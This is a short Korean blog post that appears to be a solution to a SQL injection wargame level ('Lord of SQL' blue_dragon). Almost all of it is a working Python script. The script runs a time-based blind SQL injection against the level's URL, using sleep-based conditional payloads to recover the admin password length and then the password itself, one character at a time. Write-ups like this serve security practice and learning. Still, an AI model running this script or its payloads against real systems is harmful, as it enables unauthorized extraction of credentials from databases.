LOS2 blue_dragon

Wargame/Lord of SQL 2018. 10. 10. 09:30 
import requests
import time

def request(payload):
    start = time.time()
    url = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
    params = {'id':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    end = time.time()
    return end-start

length = 0
for i in range(0,100):
    payload = "' or id='admin' and if(length(pw)="+str(i)+",sleep(3),1)-- x"
    if request(payload) > 2.8:
        length = i
        break

print "Find Admin Pw Length[*] = " + str(length)

admin_pw = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "' or id='admin' and if(ascii(substring(pw,"+str(i)+",1))="+str(j)+",sleep(3),1)-- x"
        if request(payload) > 2.8:
            admin_pw += chr(j)
            break
print "Find Admin Pw[*] = " + admin_pw


'Wargame > Lord of SQL' 카테고리의 다른 글

LOS2 phantom  (0) 2018.10.10
LOS2 frankenstein  (0) 2018.10.10
LOS2 red_dragon  (0) 2018.10.10
LOS2 green_dragon  (0) 2018.10.10
LOS2 evil_wizard  (0) 2018.10.10
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바